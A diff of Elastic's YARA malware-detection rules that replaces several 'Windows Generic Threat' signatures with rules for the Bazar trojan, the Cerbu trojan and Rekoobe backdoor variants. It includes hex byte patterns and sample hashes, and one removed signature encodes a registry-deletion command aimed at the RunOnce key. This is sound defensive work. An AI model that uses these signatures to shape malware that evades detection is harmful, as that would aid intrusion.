id = "711d59f6-6e8a-485d-b362-4c1bf1bda66e" + date = "2021-06-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2192-L2210" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "878c9745320593573597d62c8f3adb3bef0b554cd51b18216f6d9f5d1a32a931" - logic_hash = "e90aff7c35f60cc3446f9eeb2131edb7125bfa04eb8f90c5671d06e9ff269755" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Bazar.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f29253139dab900b763ef436931213387dc92e860b9d3abb7dcd46040ac28a0e" + logic_hash = "3bde62b468c44bdc18878fd369a7f0cf06f7be64149587a11524f725fa875f69" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "0e1bb99e22b53e6bb6350f95caaac592ddcad7695e72e298c7ab1d29d1dd4c1f" - severity = 50 + fingerprint = "a9e78b4e39f4acaba86c2595db67fcdcd40d1af611d41a023bd5d8ca9804efa4" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 2E 3F 41 56 3C 6C 61 6D 62 64 61 5F 31 3E 40 3F 4C 40 3F 3F 6F 6E 5F 65 76 65 6E 74 5F 61 64 64 40 43 6F 6D 70 6F 6E 65 6E 74 5F 4B 65 79 6C 6F 67 65 72 40 40 45 41 45 58 49 40 5A 40 } + $a = { 0F 94 C3 41 0F 95 C0 83 FA 0A 0F 9C C1 83 FA 09 0F 9F C2 31 C0 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_61Bbb571 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bazar_9Dddea36 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Bazar (Windows.Trojan.Bazar)" author = "Elastic Security" - id = "61bbb571-8544-4874-9811-bd74a5e9f712" - date = "2024-01-29" - modified = "2024-02-08" + id = "9dddea36-1345-434b-8ce6-54d2eab39616" + date = "2021-06-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2212-L2230" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "41e2a6cecb1735e8f09b1ba5dccff3c08afe395b6214396e545347927d1815a8" - logic_hash = "6b1ec666f3689638b9db9f041b0a89660b27c32590b747c5da3f4a02f01c7112" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Bazar.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "63df43daa61f9a0fbea2e5409b8f0063f7af3363b6bc8d6984ce7e90c264727d" + logic_hash = "cf88e2e896fce742ad3325d53523167d6eb42188309ed4e66f73601bbb85574e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "be0b1be30cab0789a5df29153187cf812e53cd35dbe31f9527eca2396d7503b5" - severity = 50 + fingerprint = "e322e36006cc017d5d5d9887c89b180c5070dbe5a9efd9fb7ae15cda5b726d6c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 14 8B 45 08 53 56 57 8B F9 BE 49 92 24 09 6A 1C 59 89 7D F8 2B 07 99 F7 F9 89 45 FC 8B 47 04 2B 07 99 F7 F9 89 45 F0 3B C6 0F 84 E5 00 00 00 8D 58 01 8B 47 08 2B 07 99 F7 F9 8B } + $a = { C4 10 5B 5F 5E C3 41 56 56 57 55 53 48 83 EC 18 48 89 C8 48 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_4A605E93 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bazar_3A2Cc53B : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Bazar (Windows.Trojan.Bazar)" author = "Elastic Security" - id = "4a605e93-971d-4257-b382-065159840a4c" - date = "2024-01-29" - modified = "2024-02-08" + id = "3a2cc53b-4f73-41f9-aabd-08b8755ba44c" + date = "2021-06-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2232-L2250" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1a84e25505a54e8e308714b53123396df74df1bde223bb306c0dc6220c1f0bbb" - logic_hash = "6ad7afa5bd03916917e2bbf4d736331f4319b20bfde296d7e62315584813699f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Bazar.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b057eb94e711995fd5fd6c57aa38a243575521b11b98734359658a7a9829b417" + logic_hash = "8cde37be646dbcf7e7f5e3f28f0fe8c95480861c62fa2ee8cdd990859313756c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "58185f9fdf5bbc57cd708d8c963a37824e377a045549f2eb78d5fa501082b687" - severity = 50 + fingerprint = "f146d4fff29011acf595f2cba10ed7c3ce6ba07fbda0864d746f8e6355f91add" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 20 48 8B 19 45 33 C0 48 85 DB 74 65 4C 89 01 48 83 FA FF 75 17 41 8B C0 44 38 03 74 2D 48 8B CB 48 FF C1 FF C0 44 38 01 75 F6 EB 1E 48 83 FA FE 75 1B 41 8B C0 66 44 39 03 74 0F 48 8B } + $a = { 48 63 41 3C 45 33 ED 44 8B FA 48 8B F9 8B 9C 08 88 00 00 00 44 8B A4 08 8C 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_B509Dfc8 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bazar_De8D625A : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Bazar (Windows.Trojan.Bazar)" author = "Elastic Security" - id = "b509dfc8-6ec3-4315-a1ec-61e6b65793e7" - date = "2024-01-29" - modified = "2024-02-08" + id = "de8d625a-8f85-47b7-bcad-e3cc012e4654" + date = "2022-01-14" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2252-L2270" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9b5124e5e1be30d3f2ad1020bbdb93e2ceeada4c4d36f71b2abbd728bd5292b8" - logic_hash = "90b00caf612f56a898b24c28ae6febda3fd11f382ab1deba522bdd2e2ba254b4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Bazar.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1ad9ac4785b82c8bfa355c7343b9afc7b1f163471c41671ea2f9152a1b550f0c" + logic_hash = "5fd7bb4ac818ec1b4bfcb7d236868a31b2f726182407c07c7f06c1d7e9c15d02" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bb1e607fe0d84f25c9bd09d31614310e204dce17c4050be6ce7dc6ed9dfd8f92" - severity = 50 + fingerprint = "17b2de5803589634fd7fb4643730fbebfa037c4d0b66be838a1c78af22da0228" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 28 00 00 0A 6F 29 00 00 0A 6F 2A 00 00 0A 13 04 11 04 28 22 00 00 0A 28 2B 00 00 0A 2D 0D 11 04 28 22 00 00 0A 28 2C 00 00 0A 26 06 28 2D 00 00 0A 2C 0F 06 73 28 00 00 0A 13 05 11 05 6F 2E 00 } + $a = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 49 8B F0 48 8B FA 48 8B D9 48 85 D2 74 61 4D 85 C0 74 5C 48 39 11 75 06 4C 39 41 08 74 2B 48 8B 49 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_7A49053E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Cerbu_69D5657E : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Cerbu (Linux.Trojan.Cerbu)" author = "Elastic Security" - id = "7a49053e-5ae4-4141-9471-4a92e0ee226e" - date = "2024-01-29" - modified = "2024-02-08" + id = "69d5657e-1fe9-4367-b478-218c278c7fbc" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2272-L2292" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "29fb2b18cfd72a2966640ff59e67c89f93f83fc17afad2dfcacf9f53e9ea3446" - logic_hash = "6db95f20a2bcdfd7cb37cb33dae6351dd19f51a8c3cae54b1bb034af17378094" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Cerbu.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f10bf3cf2fdfbd365d3c2d8dedb2d01b85236eaa97d15370dbcb5166149d70e9" + logic_hash = "644e8d5a1b5c8618e71497f21b0244215924e293e274b9164692dd927cd74ba8" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "49c41c5372da04b770d903013ee7f71193a4650340fd4245d6d5bceff674d637" - severity = 50 + fingerprint = "7dfaebc6934c8fa97509831e0011f2befd0dbc24a68e4a07bc1ee0decae45a42" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 5D 76 3F 3F 32 40 59 41 50 41 58 49 40 5A 66 } - $a2 = { 41 75 74 68 6F 72 69 7A 61 26 42 61 73 69 63 48 24 } - $a3 = { 4A 7E 4C 65 61 76 65 47 65 74 51 75 65 } + $a = { E8 5B 5E C9 C3 55 89 E5 83 EC 08 83 C4 FC FF 75 0C 6A 05 FF } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Fca7F863 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rekoobe_E75472Fa : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Rekoobe (Linux.Trojan.Rekoobe)" author = "Elastic Security" - id = "fca7f863-8d5b-4b94-8f60-a72c76782d1d" - date = "2024-01-29" - modified = "2024-02-08" + id = "e75472fa-0263-4a47-a3bd-2d1bb14df177" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2294-L2312" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9d0e786dd8f1dc05eae910c6bcf15b5d05b4b6b0543618ca0c2ff3c4bb657af3" - logic_hash = "ad45fe6e8257d012824b36aaee1beccb82c1b78031de86c1f1dd26d5be88aa6f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rekoobe.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8d2a9e363752839a09001a9e3044ab7919daffd9d9aee42d936bc97394164a88" + logic_hash = "e3e9934ee8ce6933f676949c5b5c82ad044ac32f08fe86697b0a0cf7fb63fc5e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4b391399465f18b01d7cbdf222dd7249f4fff0a5b4b931e568d92f47cc283a27" - severity = 50 + fingerprint = "4e7605685ba7ba53afeafdef7e46bdca76109bd4d8b9116a93c301edeff606ee" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 89 E5 8D 64 24 F4 53 89 C3 6A 0C 8D 45 F4 50 6A 00 FF 53 10 50 FF 53 0C 50 FF 53 24 8B 45 F4 89 43 2C 03 40 3C 8B 40 50 89 43 34 6A 40 68 00 30 00 00 FF 73 34 6A 00 FF 13 89 43 30 8B 4B 34 } + $a = { 00 00 00 83 F8 01 74 1F 89 D0 48 8B 4C 24 08 64 48 33 0C 25 28 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Cafbd6A3 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rekoobe_52462Fe8 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Rekoobe (Linux.Trojan.Rekoobe)" author = "Elastic Security" - id = "cafbd6a3-c367-467d-b305-fb262e4d6d07" - date = "2024-01-29" - modified = "2024-02-08" + id = "52462fe8-a40c-4620-b539-d0c1f9d2ceee" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2314-L2333" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "97081a51aa016d0e6c9ecadc09ff858bf43364265a006db9d7cc133f8429bc46" - logic_hash = "28813fc8a49b6ec3fe7675409fde923f0f30851429a526c142e0a228b4e0efa6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rekoobe.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c1d8c64105caecbd90c6e19cf89301a4dc091c44ab108e780bdc8791a94caaad" + logic_hash = "1ab6979392eeaa7bd6bd84f8d3531bd9071c54b58306a42dcfdd27bf7ec8f8cd" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "d3237c30fb6eef10b89dc9138572f781cc7d9dad1524e2e27eee82c50f863fbb" - severity = 50 + fingerprint = "e09e8e023b3142610844bf7783c5472a32f63c77f9a46edc028e860da63e6eeb" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 6C 6B 73 6A 66 68 67 6C 6B 6A 66 73 64 67 31 33 31 } - $a2 = { 72 65 67 20 44 65 6C 65 74 65 20 22 48 4B 4C 4D 5C 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 4F 6E 63 65 22 20 2F 66 20 3E 20 6E 75 6C } + $a = { 1C D8 48 8B 5A E8 4A 33 0C DE 48 89 4A E0 89 D9 C1 E9 18 48 8B } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_D8F834A9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rekoobe_De9E7Bdf : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Rekoobe (Linux.Trojan.Rekoobe)" author = "Elastic Security" - id = "d8f834a9-41b7-4fc9-8100-87b9b07c0bc7" - date = "2024-01-29" - modified = "2024-02-08" + id = "de9e7bdf-c515-4af8-957a-e489b7cb9716" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2335-L2353" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c118c2064a5839ebd57a67a7be731fffe89669a8f17c1fe678432d4ff85e7929" - logic_hash = "9fa1a65f3290867e4c59f14242f7261741e792b8be48c053ac320a315f2c1beb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rekoobe.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "447da7bee72c98c2202f1919561543e54ec1b9b67bd67e639b9fb6e42172d951" + logic_hash = "bdc4a3e4eeffc0d32e6a86dda54beceab8301d0065731d9ade390392ab4c6126" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fcf7fc680c762ffd9293a84c9ac2ba34b18dc928417ebdabd6dfa998f96ed1f6" - severity = 50 + fingerprint = "ab3f0b9179a136f7c1df43234ba3635284663dee89f4e48d9dfc762fb762f0db" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 C4 F4 53 56 57 8B F9 8B F2 8B D8 33 D2 8A 55 08 0F AF 53 30 D1 FA 79 03 83 D2 00 03 53 30 8B 43 34 E8 62 48 04 00 89 45 FC 68 20 00 CC 00 8B 45 20 50 57 56 8B 45 FC 8B 10 FF 52 20 } + $a = { F5 48 89 D6 48 C1 EE 18 40 0F B6 F6 48 33 2C F1 48 89 D6 48 C1 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_De3F91C6 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rekoobe_B41F70C2 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Rekoobe (Linux.Trojan.Rekoobe)" author = "Elastic Security" - id = "de3f91c6-bca8-4ed6-8ba3-a53903556903" - date = "2024-01-31" - modified = "2024-02-08" + id = "b41f70c2-abe4-425a-952f-5e0c9e572a76" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2355-L2373" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e2cd4a8ccbf4a3a93c1387c66d94e9506b5981357004929ce5a41fcedfffb20f" - logic_hash = "032ac2adb11782d823f50bfedf4e4decb731dbe7d3abbb3b05ccff598ba7edb8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rekoobe.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "19c1a54279be1710724fc75a112741575936fe70379d166effc557420da714cd" + logic_hash = "02de55c537da1cc03af26a171c768ad87984e45983c3739f90ad9983c70e7ccf" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bd994a85b967e56628a3fcd784e4d73cf6bd9f34a222d1bb52b1e87b775fdd06" - severity = 50 + fingerprint = "396fcb4333abe90f4c228d06c20eeff40f91e25fde312cc7760d999da0aa1027" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 56 8B 75 08 80 7E 04 00 74 08 FF 36 E8 0B 41 00 00 59 83 26 00 C6 46 04 00 5E 5D C3 55 8B EC 8B 45 08 8B 4D 0C 3B C1 75 04 33 C0 5D C3 83 C1 05 83 C0 05 8A 10 3A 11 75 18 84 D2 74 EC } + $a = { E2 10 4D 31 D1 0F B6 D6 48 8B 14 D1 48 C1 E2 08 4C 31 CA 48 89 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_F0516E98 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rekoobe_1D307D7C : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Rekoobe (Linux.Trojan.Rekoobe)" author = "Elastic Security" - id = "f0516e98-57e1-4e88-b49d-afeff21f6915" - date = "2024-01-31" - modified = "2024-02-08" + id = "1d307d7c-cc84-44e5-8fa0-eda9fffb3964" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2375-L2394" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "21d01bd53f43aa54f22786d7776c7bc90320ec6f7a6501b168790be46ff69632" - logic_hash = "28f5b1a05d90745f432aee6bb9da3855d70b18d556153059794c5e53bbd5117c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rekoobe.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "00bc669f79b2903c5d9e6412050655486111647c646698f9a789e481a7c98662" + logic_hash = "de4807353d2ba977459a1bf7f51fd815e311c0bdc5fccd5e99fd44a766f6866f" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "c43698c42411080f4df41f0f92948bc5d545f46a060169ee059bb47efefa978c" - severity = 50 + fingerprint = "11b1474dbdc376830bca50dbeea7f7f786c8a9b2ac51a139c4e06bed7c867121" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 69 66 20 65 78 69 73 74 20 25 73 20 67 6F 74 6F 20 3A 72 65 70 65 61 74 } - $a2 = { 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 5F } + $a = { F8 01 75 56 83 7C 24 3C 10 75 1C BE ?? ?? 60 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_3C4D9Cbe : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rekoobe_7F7Aba78 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Rekoobe (Linux.Trojan.Rekoobe)" author = "Elastic Security" - id = "3c4d9cbe-700f-4f3e-8e66-d931d5c90d3e" - date = "2024-01-31" - modified = "2024-02-08" + id = "7f7aba78-6e64-41c4-a542-088a8270a941" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2396-L2414" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "21d01bd53f43aa54f22786d7776c7bc90320ec6f7a6501b168790be46ff69632" - logic_hash = "b32f9a3b86c60d4d69c59250ac59e93aee70ede890b059b13be999adbe043d2c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rekoobe.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "50b73742726b0b7e00856e288e758412c74371ea2f0eaf75b957d73dfb396fd7" + logic_hash = "a3b46d29fa51dd6a911cb9cb0e67e9d57d3f3b6697dc8edcc4d82f09d9819a92" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "15be51c438b7b2a167e61e35821445404a38c2f8c3e037061a1eba4bf0ded2b5" - severity = 50 + fingerprint = "acb8f0fb7a7b0c5329afeadb70fc46ab72a7704cdeef64e7575fbf2c2dd3dbe2" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 53 56 57 8B 55 08 8B DA 8B 7A 3C 03 FA 66 81 3F 50 45 75 54 03 5F 78 8B 4B 18 8B 73 20 8B 7B 24 03 F2 03 FA FC 55 8B 6D 0C AD 03 C2 96 87 FD 51 33 C9 80 C1 0F F3 A6 72 0C 96 59 87 FD } + $a = { F0 89 D0 31 D8 21 F0 31 D8 03 45 F0 89 CF C1 CF 1B 01 F8 C1 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Deb82E8C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rekoobe_Ab8Ba790 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Rekoobe (Linux.Trojan.Rekoobe)" author = "Elastic Security" - id = "deb82e8c-57dc-47ea-a786-b4e1ae41a40f" - date = "2024-01-31" - modified = "2024-02-08" + id = "ab8ba790-d2dd-4756-af5c-6f78ba10c92d" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2416-L2435" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0f5791588a9898a3db29326785d31b52b524c3097370f6aa28564473d353cd38" - logic_hash = "c24baecab39c72f6bb30713022297cb9fb41ef5339a353702f3f780a630d5b27" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rekoobe.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2aee0c74d9642ffab1f313179c26400acf60d7cbd2188bade28534d403f468d4" + logic_hash = "2a7a71712ad3f756a2dc53ec80bd9fb625f7c679fd9566945ebfeb392b9874a9" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "3429ecf8f509c6833b790156e61f0d1a6e0dc259d4891d6150a99b5cb3f0f26e" - severity = 50 + fingerprint = "decdd02a583562380eda405dcb892d38558eb868743ebc44be592f4ae95b5971" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 50 6F 76 65 72 74 79 20 69 73 20 74 68 65 20 70 61 72 65 6E 74 20 6F 66 20 63 72 69 6D 65 2E } - $a2 = { 2D 20 53 79 73 74 65 6D 4C 61 79 6F 75 74 20 25 64 } + $a = { DB F9 66 0F 71 D1 08 66 0F 67 DD 66 0F DB E3 66 0F 71 D3 08 66 0F } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_278C589E : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_A681F24A : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "278c589e-fca0-4228-8ffa-6b5e4627b1b1" - date = "2024-01-31" - modified = "2024-02-08" + id = "a681f24a-7054-4525-bcf8-3ee64a1d8413" + date = "2021-06-10" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2437-L2455" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cccc6c1bf15a7d5725981de950475e272c277bc3b9d266c5debf0fc698770355" - logic_hash = "59bbbecd73541750f7221b12895ccf51e1a6863ceca62e23f541df904ad23587" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L1-L21" + license_url = 